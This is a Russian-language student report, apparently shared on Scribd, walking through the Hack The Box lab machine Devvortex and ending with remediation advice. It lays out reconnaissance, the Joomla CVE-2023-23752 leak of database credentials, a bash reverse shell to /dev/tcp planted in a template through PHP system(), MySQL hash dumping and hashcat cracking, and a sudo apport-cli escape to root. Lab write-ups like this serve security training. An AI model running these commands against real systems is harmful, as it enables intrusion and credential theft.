Скачайте в формате PDF, TXT или читайте онлайн в Scribd
Скачать как pdf или txt
Вы находитесь на странице: 1из 3
Отчет по домашней работе
Цель: сервер Devvortex, адрес 10.10.11.242
Ход работы: 1. Сканируем адреса сервера на предмет отрытых портов: nmap -T4 -A -p- 10.10.11.242 В результате выполнения команды получаем: 22/tcp open ssh 80/tcp nginx 1.18.0 На целевом сервере поднят HTTP-сервер nginx и открыта возможность удаленного подключения по протоколу SSH 2. Идентифицируем размещенный на целевой машине web-сайт: whatweb http://10.10.11.242/ В выводе команды видим, что домен у веб-сайта следующий: http://devvortex.htb/ Пописываем полученный домен в файл /etc/hosts для доступа на сайт: 10.10.11.242 devvortex.htb 3. Исследуем домен сайта на предмет поддоменов: wfuzz -t 80 -w /home/kali/Downloads/subdomain_megalist.txt --hc 302 -u http://devvortex.htb -H 'Host: FUZZ.devvortex.htb' В результате найден поддомен: http://dev.devvortex.htb 4. При помощи файла dev.devvortex.htb/robots.txt/, предназначенного для индексирования сайта для роботов поисковых систем, получаем список скрытых ссылок поддомена dev.devvortex.htb, а также то, что сайт написан при помощи CMS Joomla: Disallow: /administrator/ Disallow: /api/ Disallow: /bin/ Disallow: /cache/ Disallow: /cli/ Disallow: /components/ Disallow: /includes/ Disallow: /installation/ Disallow: /language/ Disallow: /layouts/ Disallow: /libraries/ Disallow: /logs/ Disallow: /modules/ Disallow: /plugins/ Disallow: /tmp/ 5. При помощи файла dev.devvortex.htb/administrator/manifests/files/joomla.xml узнаем версию CMS Joomla: curl dev.devvortex.htb/administrator/manifests/files/joomla.xml Версия CMS 4.2.6. Данная версия имеет уязвимость доступа к файлам, которые должны быть скрыты для чтения (CVE-2023-23752). Прочитаем один из таких файлов: curl dev.devvortex.htb/api/index.php/v1/config/application?public=true В данном файле находим наличие БД MySQL креды доступа для одного из пользователей: "dbtype":"mysql" "user":"lewis" "password":"P4ntherg0t1n5r3c0n##" 6. Логинимся на странице dev.devvortex.htb/administrator/ при помощи найденных кред. Согласно описанию уязвимости CVE-2023-23752 в шаблоне файла index.php можно прописать команду, которая выполнится на сервере: system('bash -c "bash -i >& /dev/tcp/10/10/14/90/4545 0>&1"'); При помощи данной команды и утилиты socat создадим обратный шелл для удаленного подключения к серверу: socat -d -d TCP-LISTEN:4545 STDOUT 7. На сервере логинимся в БД MySQL под пользователем lewis: mysql -u lewis -p Просматриваем имеющиеся базы данных: show databases; Переходим в интересующую нас базу данных joomla и просматриваем ее таблицы: use joomla; show tables; Нас интересует таблица пользователей sd4fg_users, просмотрим записи в ней: select * from sd4fg_users; В указанной таблице найден логин пользователя logan и захэшированный пароль $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12, при помощи утилиты hashcat расшифруем хэш, чтобы найти пароль: hashcat -a 0 -m 3200 hash /usr/share/wordlists/rockyou.txt Найденный пароль: tequieromucho 8. По протоколу SSH заходим на удаленный сервер как пользователь logan: ssh [email protected] В домашнем каталоге пользователя logan находим первый флаг user.txt. При помощи команды sudo -l выясняем, какие команды может использовать пользователь logan от имени суперпользователя: /usr/bin/apport-cli Изучим справку на данную команду: sudo /usr/bin/apport-cli –help Нас интересует опция -f, запустим команду с ней: sudo /usr/bin/apport-cli -f В выводе команды сначала выбираем пункт 4 (Sound/audio related problems), затем опцию V (View report). Открывается редактор vi, запущенный от имени суперпользователя, с сосбтвенной командной строкой. В командной строке вводим: !/bin/bash Получаем доступ к оболочке от имени root, а следовательно полный доступ к удаленному серверу. В домашнем каталоге пользователя root находим второй флаг root.txt. Флаги: user.txt: dfe438f9049e50183df3917ac66e0dd5 root.txt: 8b5843739fc68015268b629f45078a99 Рекомендации по устранению найденных уязвимостей: 1. Обновить Joomla до актуальной версии 2. Не хранить пароли в открытом виде 3. Не испльзовать пароли из словарей 4. Использовать разные креды для пользователя сервера и пользователя БД 5. Убрать из команды apport-cli возможность доступа пользователя к редактору vi